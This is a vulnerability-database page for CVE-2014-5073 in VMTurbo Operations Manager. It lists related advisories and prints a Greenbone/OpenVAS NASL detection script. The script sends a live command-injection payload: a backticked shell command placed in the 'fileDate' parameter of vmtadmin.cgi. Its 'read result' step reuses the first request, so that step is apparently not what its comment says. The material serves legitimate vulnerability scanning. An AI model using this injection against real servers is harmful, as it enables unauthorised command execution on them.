| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution | 14 Aug 201400:00 | – | zdt | |
| CVE-2014-5073 | 29 May 201815:50 | – | circl | |
| CVE-2014-5073 | 29 Aug 201417:00 | – | cve | |
| CVE-2014-5073 | 29 Aug 201417:00 | – | cvelist | |
| VMTurbo Operations Manager 4.6 - 'vmtadmin.cgi' Remote Command Execution (Metasploit) | 14 Aug 201400:00 | – | exploitdb | |
| VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution | 11 Aug 201414:57 | – | metasploit | |
| CVE-2014-5073 | 29 Aug 201416:55 | – | nvd | |
| VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution | 14 Aug 201400:00 | – | packetstorm | |
| Code injection | 29 Aug 201416:55 | – | prion | |
| VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution | 20 Aug 201400:00 | – | seebug |
| Source | Link |
|---|---|
| secunia | www.secunia.com/secunia_research/2014-8/ |
| securityfocus | www.securityfocus.com/bid/69225 |
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:vmturbo:operations_manager";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.105067");
script_cve_id("CVE-2014-5073");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_version("2024-06-28T15:38:46+0000");
script_name("VMTurbo Operations Manager '/cgi-bin/vmtadmin.cgi' RCE Vulnerability");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/69225");
script_xref(name:"URL", value:"http://secunia.com/secunia_research/2014-8/");
script_tag(name:"last_modification", value:"2024-06-28 15:38:46 +0000 (Fri, 28 Jun 2024)");
script_tag(name:"creation_date", value:"2014-08-18 14:14:43 +0200 (Mon, 18 Aug 2014)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Web application abuses");
script_copyright("Copyright (C) 2014 Greenbone AG");
script_dependencies("gb_vmturbo_operations_manager_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("vmturbo/installed");
script_tag(name:"impact", value:"An attacker may leverage this issue to execute arbitrary OS commands
in the context of the affected application.");
script_tag(name:"vuldetect", value:"Send two special crafted HTTP GET requests and check the response.");
script_tag(name:"insight", value:"Input passed via the 'fileDate' GET parameter to /cgi-bin/vmtadmin.cgi
(when 'callType' is set to 'DOWN' and 'actionType' is set to 'GETBRAND', 'GETINTEGRATE',
'FULLBACKUP', 'CFGBACKUP', 'EXPORTBACKUP', 'EXPERTDIAGS', or 'EXPORTDIAGS') is not
properly sanitised before being used to execute commands. This can be exploited to inject
and execute arbitrary shell commands with privileges of the 'wwwrun' user.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"solution", value:"Update to VMTurbo Operations Manager >= 4.6-28657.");
script_tag(name:"summary", value:"VMTurbo Operations Manager is prone to a remote command
execution (RCE) vulnerability.");
script_tag(name:"affected", value:"VMTurbo Operations Manager 4.6 and prior are vulnerable.");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
include("misc_func.inc");
if( ! port = get_app_port( cpe:CPE ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
vtstrings = get_vt_strings();
rand = vtstrings["lowercase_rand"];
cmd = 'echo%20' + rand + '%20>%20/tmp/vmtbackup.zip';
url = '/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate="`' + cmd + '`"';
req = http_get( item:url, port:port );
http_send_recv( port:port, data:req, bodyonly:FALSE ); # execute cmd
url = '/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP';
buf = http_send_recv( port:port, data:req, bodyonly:FALSE ); # read result
if( buf && buf =~ "^HTTP/1\.[01] 200" && egrep( pattern:rand, string:buf ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation